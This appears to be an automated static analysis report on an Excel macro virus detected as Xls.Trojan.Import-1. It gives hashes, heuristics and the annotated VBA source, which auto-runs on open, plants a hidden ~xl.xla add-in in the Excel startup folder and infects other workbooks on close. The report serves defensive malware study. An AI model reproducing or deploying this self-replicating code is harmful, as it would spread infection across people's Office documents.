Xls.Trojan.Import-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 9638fc6f43220c8b…

MALICIOUS

Office (OLE)

69.0 KB Created: 1997-09-11 13:21:10 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: f605ce99395f0db57633d9e1b87ff2e6 SHA-1: 7ed58effabbd53da8b04dce3e2601a318aeeca43 SHA-256: 9638fc6f43220c8b81af2d3caaf1b7622a84c0cb4d16fbbb071973d1f37ac674
180 Risk Score

Malware Insights

Xls.Trojan.Import-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1137.006 Office Application Startup: Add-ins (add-in saved to Application.StartupPath, see Initialize) T1566.001 Spearphishing Attachment (assumed delivery vector; not evidenced by the sample itself)

The file is an Excel workbook containing a VBA macro with an Auto_Open subroutine, a legacy auto-macro that runs as soon as the workbook is opened with macros enabled. The macro is not a downloader: nothing in the extracted source fetches or executes an external payload. It is a self-replicating macro virus. Auto_Open attaches a 'Replicator' class instance to the Application object so that it receives WorkbookOpen/WorkbookBeforeClose events for every workbook; on first run (when the host is not already in Application.StartupPath) it exports its own two modules ('ArtiLife' and 'Replicator') to files named ~a0183 and ~r0183 in Application.DefaultFilePath, creates a new workbook, imports the modules into it and saves it as an add-in (~xl.xla) in Application.StartupPath so the code is loaded whenever Excel starts. Any workbook that does not yet contain a 'Replicator' module is infected on close by importing those two files into its VBProject. A routine scheduled with Application.OnTime for 16:00 scrolls the text 'The Phantom' through the status bar (the remainder of that routine is truncated in this listing). Module export/import through VBProject.VBComponents requires programmatic access to the VBA project object model, which current Office versions disable by default ('Trust access to the VBA project object model'), so replication is unlikely to succeed on a modern default configuration. Host-based indicators: ~a0183 and ~r0183 in the user's default file path and ~xl.xla in the Excel startup path. The ClamAV detection 'Xls.Trojan.Import-1' corroborates the malicious classification.

Heuristics 3

  • ClamAV: Xls.Trojan.Import-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Import-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12757 bytes
SHA-256: 962295669636efa067bfb2c22d8b9877ad182a1495c2f7c8809ce8ffd0361e53
Detection
ClamAV: Xls.Trojan.Import-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ArtiLife"
Option Explicit
' Standard module. Holds the single Replicator instance (class module below)
' that Auto_Open binds to the Application object so its WithEvents handlers
' fire for every workbook opened or closed in this Excel session.
Dim Replica As New Replicator

' Legacy auto-macro: Excel runs this automatically when the workbook is opened
' with macros enabled.
Sub Auto_Open()
    ' Bind the Application object so Replicator's App_* event handlers are invoked.
    Set Replica.App = Application
    ' Only run the install/replication step when this copy is not already the
    ' one living in Application.StartupPath (i.e. not the dropped ~xl.xla add-in).
    If ThisWorkbook.Path <> Application.StartupPath Then Replica.Initialize
    ' Schedule the visible payload (DeliverPayload -> Replicator.Activate) for 16:00.
    Application.OnTime TimeValue("16:00:00"), "DeliverPayload"
End Sub

' OnTime callback registered by Auto_Open; simply forwards to the payload routine.
Sub DeliverPayload()
    Replica.Activate
End Sub


Attribute VB_Name = "Replicator"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_Creatable = True
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
' Class module implementing the replication logic. App is declared WithEvents
' so that, once Auto_Open assigns the Application object to it, the
' App_WorkbookOpen / App_WorkbookBeforeClose handlers below receive
' application-wide workbook events.
Public WithEvents App As Application
' Directory the two module files (~a0183, ~r0183) are written to and read from;
' set from Application.DefaultFilePath in Export and Import.
Private dpath As String

' Application-level event: raised before any open workbook closes.
' If the closing workbook does not already contain a "Replicator" component,
' the two exported module files are imported into its VBProject (see Import).
' The handler does not save the workbook itself, so whether the injected
' modules persist depends on what happens to the workbook after this point.
Private Sub App_WorkbookBeforeClose(ByVal Wb As Workbook, Cancel As Boolean)
    Dim infwb As String
    On Error Resume Next    ' errors in the lines below are silently ignored
    infwb = Wb.Name
    If Infchecker(infwb) = False Then Import infwb
End Sub

' Application-level event: raised whenever a workbook is opened.
' If the opened workbook already carries the "Replicator" component and is NOT
' located in Application.StartupPath, both virus modules are removed from it.
' Presumably this keeps the resident add-in copy intact while infected documents
' are cleaned on open and re-infected on close (see App_WorkbookBeforeClose) —
' the intent is not stated in the code.
Private Sub App_WorkbookOpen(ByVal Wb As Workbook)
    Dim infwb As String
    On Error Resume Next    ' errors in the lines below are silently ignored
    infwb = Wb.Name
    If Wb.Path <> Application.StartupPath Then
        If Infchecker(infwb) = True Then Remove infwb
    End If
End Sub

' Writes the two virus modules out of the named workbook's VBProject as source
' files in Application.DefaultFilePath: "Artilife" -> ~a0183, "Replicator" -> ~r0183.
' No return value is assigned. Requires programmatic access to the VBA project
' object model; no error handling here, so failures propagate to the caller
' (Initialize, which runs under On Error Resume Next).
' The component is looked up as "Artilife" although the module is named
' "ArtiLife"; VBComponents(name) lookup appears to be case-insensitive for this
' to work — not verifiable from the listing.
Function Export(wkbk As String)
    dpath = Application.DefaultFilePath
    Workbooks(wkbk).VBProject.VBComponents("Artilife").Export (dpath & "\~a0183")
    Workbooks(wkbk).VBProject.VBComponents("Replicator").Export (dpath & "\~r0183")
End Function

' Install step, run once from Auto_Open when the host workbook is not in
' Application.StartupPath:
'   1. export this workbook's two modules to ~a0183 / ~r0183 (Export);
'   2. create a fresh workbook, flag it as an add-in and import the modules;
'   3. save it as ~xl.xla in Application.StartupPath so it loads on every Excel start.
' The exported module files are left behind in DefaultFilePath (never deleted).
' Screen updating is disabled for the duration to hide the new workbook.
' All errors are suppressed, so a failed step leaves no visible trace.
Function Initialize()
    Dim curname As String
    Dim backgrounder As Object
    Dim stpath As String
    On Error Resume Next
    Application.ScreenUpdating = False
    curname = ThisWorkbook.Name
    stpath = Application.StartupPath
    Export curname
    Set backgrounder = Workbooks.Add
    backgrounder.IsAddin = True    ' add-in workbooks are hidden from the user
    Import backgrounder.Name
    backgrounder.SaveAs (stpath & "\~xl.xla")    ' dropped into the Excel startup folder
    Application.ScreenUpdating = True
End Function

' Injects the two module files (~a0183, ~r0183) from Application.DefaultFilePath
' into the named workbook's VBProject. Does not check that the files exist and
' has no error handling of its own; callers run under On Error Resume Next.
' No return value is assigned.
Function Import(ByVal wkbk As String)
    dpath = Application.DefaultFilePath
    Workbooks(wkbk).VBProject.VBComponents.Import (dpath & "\~a0183")
    Workbooks(wkbk).VBProject.VBComponents.Import (dpath & "\~r0183")
End Function

' Strips both virus components ("Artilife", "Replicator") from the named
' workbook's VBProject. Called from App_WorkbookOpen for infected workbooks
' outside StartupPath. No error handling here; the caller suppresses errors.
' No return value is assigned.
Function Remove(wbname As String)
    Dim vbart As Object, vbrep As Object
    Set vbart = Workbooks(wbname).VBProject.VBComponents("Artilife")
    Set vbrep = Workbooks(wbname).VBProject.VBComponents("Replicator")
    Workbooks(wbname).VBProject.VBComponents.Remove vbart
    Workbooks(wbname).VBProject.VBComponents.Remove vbrep
End Function

' Infection marker check: returns True if the named workbook's VBProject contains
' a component whose name is exactly "Replicator" (StrComp with compare mode 0 =
' binary, i.e. case-sensitive). Because errors are suppressed and the default is
' False, a VBProject that cannot be enumerated at all is reported as "not infected".
Private Function Infchecker(wbname As String) As Boolean
    On Error Resume Next
    Dim vbp As Object
    Infchecker = False
    For Each vbp In Workbooks(wbname).VBProject.VBComponents
        If StrComp(vbp.Name, "Replicator", 0) = 0 Then
            Infchecker = True
            Exit For
        End If
    Next vbp
End Function

Function Activate()
    Dim msg(26) As String
    Dim i As Integer
        For i = 0 To 26
            msg(i) = Right("               The Phantom", i + 1)
            Application.StatusBar = msg(i)
                If 
... (truncated)